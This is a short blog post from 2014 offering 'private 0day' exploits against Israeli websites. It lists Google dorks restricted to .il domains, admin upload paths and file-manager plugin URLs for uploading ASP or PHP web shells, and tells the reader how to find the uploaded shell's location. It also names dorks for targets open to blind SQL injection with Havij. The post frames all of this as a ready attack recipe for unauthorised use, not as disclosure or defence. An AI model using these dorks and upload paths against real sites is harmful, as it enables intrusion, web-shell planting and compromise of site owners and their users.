Tuesday, 8 April 2014

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

0 comments:

Post a Comment